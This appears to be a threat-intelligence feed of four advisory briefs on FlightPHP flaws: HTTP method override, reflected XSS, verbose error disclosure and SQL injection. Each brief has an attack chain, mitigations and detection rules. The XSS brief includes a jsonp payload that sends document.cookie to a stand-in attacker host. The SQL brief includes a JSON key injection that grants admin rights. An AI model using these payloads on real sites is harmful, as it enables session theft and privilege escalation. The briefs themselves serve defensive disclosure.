https://feed.craftedsignal.io/products/flightphp/core--3.18.1/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioFri, 26 Jan 2024 12:00:00 +0000https://feed.craftedsignal.io/briefs/2024-01-26-flightphp-http-override/Fri, 26 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-26-flightphp-http-override/A vulnerability in FlightPHP core versions before 3.18.1 allows attackers to override HTTP methods via the `X-HTTP-Method-Override` header or `_method` parameter, leading to CSRF escalation, middleware bypass, and cache poisoning.FlightPHP versions prior to 3.18.1 are vulnerable to HTTP method override. The vulnerability resides in the Request::getMethod() function within flight/net/Request.php. The application unconditionally honors the X-HTTP-Method-Override header and the $_REQUEST['_method'] parameter, even on safe HTTP verbs like GET. This behavior allows an attacker to modify the intended HTTP method, potentially leading to Cross-Site Request Forgery (CSRF) escalation, bypassing of authentication and rate-limiting middleware, and CDN cache poisoning. This vulnerability was discovered by @Rootingg and patched in version 3.18.1 (commit b8dd23a) by introducing the flight.allow_method_override setting. Disabling this setting mitigates the vulnerability by ignoring method overrides.

Attack Chain

1. The attacker identifies a FlightPHP application using a version prior to 3.18.1.
2. The attacker locates an endpoint that performs a sensitive action using an unsafe HTTP method (e.g., DELETE, PUT).
3. The attacker crafts a malicious URL targeting the vulnerable endpoint, using a GET request with either the _method parameter (e.g., /?_method=DELETE) or the X-HTTP-Method-Override header.
4. For CSRF, the attacker embeds the malicious URL within an HTML <img> tag on a website they control.
5. A victim visits the attacker’s website, and their browser automatically sends a GET request to the vulnerable application.
6. The FlightPHP application incorrectly interprets the GET request as the specified unsafe method (e.g., DELETE) due to the _method parameter or X-HTTP-Method-Override header.
7. The application executes the sensitive action (e.g., deleting a resource) on behalf of the victim without proper authorization.
8. Alternatively, if middleware checks HTTP method to apply controls, this can be bypassed by issuing a GET request with a forged _method parameter or X-HTTP-Method-Override header.

Impact

Successful exploitation of this vulnerability can have several significant impacts. It allows attackers to perform CSRF attacks, potentially leading to unauthorized data modification or deletion. Attackers can bypass security middleware that relies on HTTP method verification, gaining unauthorized access to protected resources. The vulnerability also enables CDN cache poisoning, where the CDN caches the response of a GET request that was actually processed as a DELETE or PUT, serving incorrect content to future users. The exact number of affected FlightPHP applications is unknown, but any application using a vulnerable version is potentially at risk.

Recommendation

• Upgrade FlightPHP to version 3.18.1 or later to patch CVE-2026-42551.
• Set the flight.allow_method_override setting to false to disable HTTP method overriding as described in the advisory.
• Deploy the Sigma rule Detect FlightPHP HTTP Method Override via _method Parameter to detect exploitation attempts using the _method parameter.
• Deploy the Sigma rule Detect FlightPHP HTTP Method Override via X-HTTP-Method-Override Header to detect exploitation attempts using the X-HTTP-Method-Override header.

]]>highadvisorycsrfmiddleware-bypasscache-poisoninghttp-method-overridehttps://feed.craftedsignal.io/briefs/2024-01-24-flightphp-xss/Wed, 24 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-24-flightphp-xss/A reflected XSS vulnerability exists in FlightPHP versions prior to 3.18.1 due to improper validation of the jsonp query parameter in the Flight::jsonp() function, allowing attackers to inject arbitrary JavaScript leading to cookie theft, session hijacking, and data exfiltration.FlightPHP versions prior to 3.18.1 are vulnerable to reflected cross-site scripting (XSS) due to insufficient validation of the jsonp query parameter within the Flight::jsonp() function. This function, intended for JSONP responses, directly concatenates the jsonp parameter into the application/javascript response body without ensuring it’s a valid JavaScript identifier. This flaw allows an attacker to inject arbitrary JavaScript code, which then executes in the context of the victim’s origin when the vulnerable endpoint is accessed via a <script> tag from an attacker-controlled page. The vulnerability was discovered by @Rootingg and patched in version 3.18.1, commit b8dd23a, by implementing a regex validation (^[A-Za-z_$][\w$.]{0,127}$) on the callback name.

Attack Chain

1. An attacker identifies an application using FlightPHP versions prior to 3.18.1.
2. The attacker locates a route that calls the vulnerable Flight::jsonp() function.
3. The attacker crafts a malicious URL containing a jsonp parameter with an XSS payload. Example: /api?jsonp=;window.xss=function(d){fetch('https://attacker.tld/c='+d)};xss(document.cookie);//.
4. The attacker hosts a page containing a <script> tag that points to the vulnerable endpoint on the victim’s domain, using the crafted malicious URL.
5. A user visits the attacker-controlled page in a browser.
6. The browser executes the injected JavaScript code from the jsonp parameter within the victim’s origin.
7. The injected JavaScript steals sensitive information such as cookies, session tokens, or authenticated API responses.
8. The stolen data is exfiltrated to a domain controlled by the attacker (e.g., attacker.tld).

Impact

Successful exploitation of this XSS vulnerability can lead to significant consequences. Attackers can steal user cookies, hijack user sessions, and exfiltrate authenticated API responses. This impacts any application using the vulnerable Flight::jsonp() function. The number of potential victims depends on the popularity and usage of applications built with the affected FlightPHP versions. Successful attacks allow attackers to impersonate users, access sensitive data, and potentially compromise the entire application.

Recommendation

• Upgrade FlightPHP to version 3.18.1 or later to incorporate the patch that validates the callback name.
• Deploy the Sigma rule Detect FlightPHP JSONP XSS Attempt to your SIEM to detect potential exploitation attempts by monitoring for specific patterns in web server logs.
• Monitor web server logs for requests containing suspicious characters or JavaScript code within the jsonp query parameter, referencing the example URL in the Attack Chain.
• Implement strict input validation on all query parameters, especially those used in dynamic content generation, to prevent similar XSS vulnerabilities.

]]>highadvisoryreflected-xssweb-applicationphphttps://feed.craftedsignal.io/briefs/2024-01-flightphp-info-disclosure/Mon, 08 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-flightphp-info-disclosure/The default error handler in FlightPHP core writes the full exception message, exception code, and stack trace directly into the HTTP 500 response, disclosing sensitive information such as internal paths, secrets, and application structure.The FlightPHP framework, prior to version 3.18.1, is vulnerable to sensitive information disclosure due to its default error handling mechanism. The Engine::_error() function writes the full exception message, exception code, and stack trace directly into the HTTP 500 response without any debug gating. This behavior can expose internal filesystem paths, secrets interpolated into exception messages (such as database credentials or API tokens), and the application’s module structure. The vulnerability was discovered by @Rootingg and a proof of concept is available, demonstrating the leakage of sensitive information. This disclosure can provide attackers with valuable primitives for chaining other weaknesses, such as Local File Inclusion (LFI) or path traversal vulnerabilities. The issue is resolved in version 3.18.1 with the introduction of a flight.debug setting to control the verbosity of error output.

Attack Chain

1. An attacker identifies a FlightPHP application running a version prior to 3.18.1.
2. The attacker crafts a request designed to trigger an uncaught exception within the application. This could be through invalid input, resource exhaustion, or other error-inducing actions.
3. The application’s error handler, Engine::_error(), is invoked.
4. The error handler formats the exception message, code, and stack trace into an HTML response.
5. This response includes absolute filesystem paths, potentially revealing the application’s directory structure.
6. The response may also include secrets, such as database credentials or API keys, if these are inadvertently included in exception messages.
7. The HTTP 500 response is sent to the attacker’s browser, containing the sensitive information.
8. The attacker uses the disclosed information to further exploit the application, potentially leveraging LFI or path traversal vulnerabilities to gain unauthorized access or execute arbitrary code.

Impact

Successful exploitation of this vulnerability can lead to the disclosure of sensitive information, including absolute filesystem paths, database credentials, API tokens, and internal application structure. This information can be used to facilitate further attacks, such as Local File Inclusion (LFI) or path traversal vulnerabilities. The disclosure of database credentials or API tokens could grant attackers unauthorized access to sensitive data or systems. The vulnerability affects applications using FlightPHP versions prior to 3.18.1.

Recommendation

• Upgrade FlightPHP to version 3.18.1 or later to patch the vulnerability. The fix introduces a flight.debug setting that gates the verbose output, preventing sensitive information from being exposed in production environments.
• Deploy the Sigma rule “FlightPHP Sensitive Information Disclosure in HTTP Response” to detect instances of verbose error messages in HTTP 500 responses.
• Review application code to ensure that sensitive information, such as database credentials and API tokens, are not inadvertently included in exception messages.
• Enable webserver logging (category: webserver, product: linux/windows) to capture HTTP requests and responses, facilitating detection and analysis of potential exploitation attempts.

]]>highadvisoryinformation-disclosureweb-applicationflightphphttps://feed.craftedsignal.io/briefs/2024-01-03-flight-sqli/Wed, 03 Jan 2024 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2024-01-03-flight-sqli/Flight framework is vulnerable to SQL Injection; an attacker can inject arbitrary SQL by crafting malicious array keys due to SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() building SQL statements by concatenating the $table argument and the keys of the $data array directly into the query, with no identifier quoting or validation, leading to privilege escalation, arbitrary column writes, data destruction, and exfiltration.The Flight framework, specifically versions prior to 3.18.1, contains an SQL injection vulnerability in the SimplePdo class. The insert(), update(), and delete() methods construct SQL queries by directly concatenating the $table argument and the keys of the $data array into the query string without proper sanitization or validation. This allows an attacker to inject arbitrary SQL commands by crafting malicious array keys when user-controlled data is forwarded to these helper methods (e.g., $db->insert('users', $request->data->getData())). Discovered by @Rootingg, this vulnerability was addressed in commit b8dd23a and assigned CVE-2026-42550. Exploitation of this flaw can lead to privilege escalation, arbitrary data modification, and complete data exfiltration.

Attack Chain

1. Attacker identifies an application endpoint that uses the Flight framework and its database interaction methods (insert, update, delete).
2. The application uses SimplePdo::insert(), SimplePdo::update(), or SimplePdo::delete() with user-supplied data. For example: $db->insert('users', $request->data->getData());
3. The attacker crafts a malicious JSON payload with SQL injection in the array keys, such as {"name, is_admin) VALUES (?, 1);-- ": "attacker_injected"}.
4. The attacker sends the crafted JSON payload to the vulnerable endpoint via an HTTP POST request.
5. The application processes the JSON data and passes it to the vulnerable SimplePdo method.
6. The SimplePdo method concatenates the malicious array keys directly into the SQL query without validation or escaping. This results in the creation of an injected SQL query such as INSERT INTO users (name, is_admin) VALUES (?, 1);-- ) VALUES (?).
7. The database executes the injected SQL query, leading to unintended modifications, such as the creation of an administrative account or modification of existing data.
8. The attacker escalates privileges, exfiltrates data, or causes data destruction depending on the nature of the injected SQL.

Impact

Successful exploitation of this SQL injection vulnerability can lead to severe consequences, including unauthorized privilege escalation, allowing attackers to gain administrative control over the application. Attackers can also arbitrarily modify database columns, leading to data corruption or manipulation. Furthermore, data destruction and exfiltration are possible through the use of the $where parameter, potentially resulting in complete data loss or exposure of sensitive information. This vulnerability affects applications using Flight framework versions prior to 3.18.1.

Recommendation

• Upgrade to Flight framework version 3.18.1 or later, which includes the fix for CVE-2026-42550 with the requireSafeIdentifier() helper function.
• Implement input validation and sanitization on all user-supplied data before passing it to database interaction methods, even after upgrading the Flight framework.
• Deploy the Sigma rule “Detect Flight Framework SQL Injection Attempt via Malicious Array Keys” to identify potential exploitation attempts by monitoring for suspicious patterns in HTTP request bodies and application logs.
• Review and audit all existing code that uses SimplePdo::insert(), SimplePdo::update(), and SimplePdo::delete() to ensure proper data sanitization and prevent SQL injection vulnerabilities.

]]>highadvisorysql-injectionweb-applicationvulnerability